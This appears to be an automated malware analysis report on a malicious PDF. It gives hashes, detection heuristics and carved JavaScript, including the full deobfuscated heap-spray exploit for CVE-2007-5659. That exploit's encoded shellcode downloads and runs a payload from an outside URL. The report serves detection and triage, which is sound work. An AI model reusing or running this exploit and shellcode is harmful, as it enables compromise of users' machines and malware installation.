Malicious PDF — malware analysis report

Static analysis result for SHA-256 820308f6e6b2c701…

MALICIOUS

PDF

4.6 KB Created: 2008-08-06 01:42:27 Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12) First seen: 2026-05-08
MD5: 707e4f924cd9df6aeb735b3f2d7ecd63 SHA-1: 93d8bee1ece9512055cbe03b8e029ba8a2e8a754 SHA-256: 820308f6e6b2c7017ea77ff370869b4110726a11c58d462a7d182714ac4e2053
290 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF file contains embedded JavaScript that exploits CVE-2007-5659 in Adobe Reader. The deobfuscated JavaScript contains a URL, http://abb192.cn/exp/load.php?id=7856&spl=4, which is likely used to download and execute a second-stage payload. The ML classifier also strongly indicated maliciousness.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 8

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://abb192.cn/exp/load.php?id=7856&spl=4 Referenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0013_001.js pdf-javascript-stream PDF /JS object 13 at offset 0x363 6245 bytes
SHA-256: 09af6c47e85b93091d29923ce1e195b2fa743b4fa1ae59a9ac3a6df28f4e2675
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function SESqA(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function FUFrdwCiaV(IRiTWhSIfzl){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(IRiTWhSIfzl)"+";"+"}");eval("function MLwST7cQEJdJMW(InvPOzyRMT4Fa){var UyXSUrkCACD2="+"0,tm7JjZnqCE5VsO=InvPOzyRMT4Fa.l"+"en"+"gth,DdgCZ6bY=10"+"2"+"4,HvY6A,N9vMSew,K9UZdNyVlb='',yAIZjMbeugp4wy=UyXSUrkCACD2,JQdEh9M=UyXSUrkCACD2,K1YgVKHiIS1r=UyXSUrkCACD2,iSqH0gK6=Ar"+"ra"+"y(63,51,20,13,53,26,30,42,33,54,0,0,0,0,0,0,19,3,6,7,28,36,21,29,34,4,35,39,22,49,59,58,11,2,47,48,55,24,18,31,32,27,44,0,0,0,0,40,0,50,5,25,57,60,46,52,9,8,61,38,37,15,62,41,0,17,10,1,23,56,12,14,45,16,43);f"+"o"+"r(N9vMSew=M"+"at"+"h.c"+"ei"+"l(tm7JjZnqCE5VsO/"+"DdgCZ6bY)"+";N9vMSew>UyXSUrkCACD2;N9vMSew-"+"-){fo"+"r(HvY6A=Ma"+"th.m"+"in(tm7JjZnqCE5VsO,DdgCZ6bY);HvY6A>UyXSUrkCACD2;HvY6A-"+"-,tm7JjZnqCE5VsO-"+"-){K1YgVKHiIS1r|"+"=(iSqH0gK6[InvPOzyRMT4Fa.cha"+"rCod"+"eAt(yAIZjMbeugp4wy+"+"+)-48])<"+"<JQdEh9M;if(JQdEh9M){K9UZdNyVlb+"+"=FUFrdwCiaV"+"(55^K1YgVKHiIS1r&"+"2"+"5"+"5);K1YgVKHiIS1r>"+">="+"8;JQdEh9M-"+"="+"2;}el"+"se{JQdEh9M="+"6"+";}}"+"}return (K9UZdNyVlb);}var yN6wcm5y=implode('',['t','IEFbGs','WmDSqSsTbr','Dq','LVsg','b9F2qLd','gC6SSbq','h2L','2','3','Et','U','l4byc','F','pb','3kGOGS2','5jMqw','u','4A6llFYDsq','IibGKdMbvGsyWd','4LVG','MCCdXt','muFLLlMLVlb2AjFCbZpqIi','bGKd','s','@CdXtmuFLL','GsC','rDMq','wu4A6llFv_gbC','dX','t','muFLLG8QtDEA6jXtccFBIh2FI32','q6','lb2WDSBIqX2','gGBBbusA','t2E2Ah2qcGMqwu4','A6ll','FvD','8VtIlycq4y','68FLtuEY','yc4qI','sScWu','MbvGqy','LFgb5','3gsN3XLwIFsS','lTswFTbrDMsmGpFCy4s2GpFvD','qyLFgbA','q','KLlGLGn4','b','t34tYt_','S','b','Ql','l2IqlFCh','4C','Fi8yAyS','pIi8yAySpIi8y','Ay','S','pIi8yCI','KD4h8','yIyXp4','h8ys','IpGwi','8ymDyG','w','i8ymDSsBi8yabCsIi8yaFSpI','i8yaFtD','9','h8yajS','sQ','i8','yMbK','Dgh8yMbtD','M','h8y','m2CpMh8y1bTpah8ya','b','KDMh8ysvXDMh8yaqXGM','h8ywItp','Ai','8yA2y','DIi8ywIt','pAi8','ysiKD','pi8','yabTsIi8y','ab','KD4h8','y','svXD','Mh','8y4dSsIi8ys','USApi8y','ac','XGBi8yCpSsIi','8yabKsBi8yabK','D','Mh8y9c','tps','i','8y4dXD4h8yp','pSA','pi8ysiXs','Bi8','yCpXDBi8y','abK','sMh8yabK','DMh8y9ctp','si8','y4dXDpi8','ygcTApi8yB','DXp','Mh8yC','pys1h','8','yabTs1h8','yabKDMh','8y9ctpsi8','y','4d','XDIi8yCD','SAp','i8yCItsBi8yCpS','AMh8yabCs4h8y','abK','DMh8y9','ctpsi8y4dyDMh8yb','iT','A','pi','8yCUKA','si8','yCpXpp','i8yabtswi8yabKD','Mh8y9c','t','p','si8y9btD4h8','y1sypMh','8y','wUtsgh8ysI','XsQi8yMsXG9h8y','ajSssi8yabKDah8','y','4c','XDMh8ywUtpsi8ys','vpG4','h8yaFKG9h8ya','hTA','Qi','8ysv','yG','si','8yMsyG','9h8','yCpyGwi8yab','t','pAi8y','a','bKDMh','8ympyG','Mh8yMhSDwi8ywICGCi8yp','e','Sspi8yabKDMh','8','ysI','XD','Mh8yM','q','XG9h8ybUt','pAi8','ybItpgh','8','ysIyGMh','8ygbKG9h8','yBDSApi8yab','KD','Mh8y4','bK','DMh8y9ctpAi8ymiyD4','h8','y','4bXD1','h8y4ctpAi8','yCpy','Dpi8yabTAa','h8y','a','bKDMh8y9cKDgh8ybepGMh','8y4qXD','Mh8y','gcXABi8ybe','SA9h8','yaFKGMh8ymUKApi8','yabKDMh8ywUKsCi8y','svp','GMh8yaqXG','9h8y','ahTAQi8ys','vyGsi8yMs','yG9h8y9','bTspi8yabKD','Mh8ymiXDMh8y4sXDmi8y9cKDgh','8y1','qCG4h8y4qC','sA','i8yBDy','G','g','h8ygbKA9h8y4qtG','Mh8y','9ctpAi8ymiyDIi8y4','bXD9h8y4c','tpAi8','yCpy','Dpi8yabC','Ggh8yabKDMh8yabTAQi8','y','w','UKsCi8ysvpGMh8ya','sXG9h8ya','3','TAQ','i8ys','vyGsi','8yMsyG9h','8yM','bTspi','8yab','KDM','h8ymiX','DM','h8ysvXsCi8yMb','KG9h8yahTAQi8ysvy','Gsi8yMsyG9h8yabTs','p','i8','yabK','DMh','8y9hKDMh8y43','t','GAi8yCi','KDg','h8yCiKDgh8yCiKDgh8y','CiKDgh8yCyypgh8y4hXD4h8ysvyGgh8yCvCsQi8y43Ksmi8yC','IK','sCi8ysvy','G9h8y','svSs','Ii8y','a','s','XAbi8y','4','FypA','i8y4dXDIi8','y','wytpAi','8ysvSDIi','8yMcXA4h8y','aqK','Ap','i8y4','dX','sgh8y','wuyp','Ai8yaqCG','Mh8y1','qKsgh8','y9by','s','si8yA2XGah8ybyK','Dg','h8y1','qtGwi','8yaGXswi8','y','MbKpBi8yBv','TDQi8yasXA4h','8yb','Uysah8yaqKDbi8y9','bKs1h8','yBiTsAi8yBUSDAi8ywUtGBi8','y4hSs9h8yCvypAi8y','4hypAi8yaqC','G4h8ymupsbi8y','aqy','pAi8ysvXG','Ai8yMqyGQi','8','y','I2X','Dgh8','yaFtpAi8ya','qtpAi8y4cys9h8yb','vtGbi8ya','bKD','p','i8yB2T','s','pi8yBDXsB','i8y4cKsCi8','y9q','
... (truncated)
generic_stage_recovery_000.js deobfuscated-js generic stage recovery sixbit-xor-table from JavaScript object 13 at offset 0x363 2532 bytes
SHA-256: a39874ad7f20d0a3bdd0722aa0938539169b55899df70b0059b84cab4c7ecfe1
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var K80pGG = new Array(); function ga6rTAM0dm(p9i8ina, s3eCP) { while (p9i8ina.length*2<s3eCP){p9i8ina += p9i8ina;} p9i8ina = p9i8ina.substring(0,s3eCP/2); return p9i8ina; } function yYgaps7P() { var mt0L4m9f2GN0yB = 0x0c0c0c0c; var tCmRPBIjkzJZ = unescape("%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u6187%uE1A1%u0703%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF%u2E87%u0A96%u0757%uEF29%uEFEF%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7BA%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEFEF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF%u8A97%uEFEF%u9A10%u64CF%uE3AA%uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED85%u64B6%uF7BA%uFF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C64%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364%u64A4%uF3B5%u32EC%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1%u7468%u7074%u2F3A%u612F%u6262%u3931%u2E32%u6E63%u652F%u7078%u6C2F%u616F%u2E64%u6870%u3F70%u6469%u373D%u3538%u2636%u7073%u3D6C%u0034"); var Yo0yx80guM = 0x400000; var ymeeVPep = tCmRPBIjkzJZ.length * 2; var s3eCP = Yo0yx80guM - (ymeeVPep+0x38); var p9i8ina = unescape("%u9090%u9090"); p9i8ina = ga6rTAM0dm(p9i8ina, s3eCP); var PFxNfpNPl0 = (mt0L4m9f2GN0yB - 0x400000)/Yo0yx80guM; for (var uzqPszkvm=0;uzqPszkvm<PFxNfpNPl0;uzqPszkvm++) { K80pGG[uzqPszkvm] = p9i8ina + tCmRPBIjkzJZ; } } function ZyRKvZUc() { var E6qckV900x8gC = app.viewerVersion.toString(); E6qckV900x8gC = E6qckV900x8gC.replace(/\D/g,""); var jsvRH = new Array(E6qckV900x8gC.charAt(0),E6qckV900x8gC.charAt(1),E6qckV900x8gC.charAt(2)); if ((jsvRH[0] == 8 && ((jsvRH[1] == 1 && jsvRH[2] < 2) || jsvRH[1] < 1)) || (jsvRH[0] == 7 && jsvRH[1] < 1) || (jsvRH[0] < 7)) { yYgaps7P(); var la4Z3NUcs77 = unescape("%u0c0c%u0c0c"); while(la4Z3NUcs77.length < 44952) la4Z3NUcs77 += la4Z3NUcs77; this.collabStore = Collab.collectEmailInfo({subj: "",msg: la4Z3NUcs77}); } } ZyRKvZUc();

Open this report in the interactive analyzer, or submit your own file for analysis.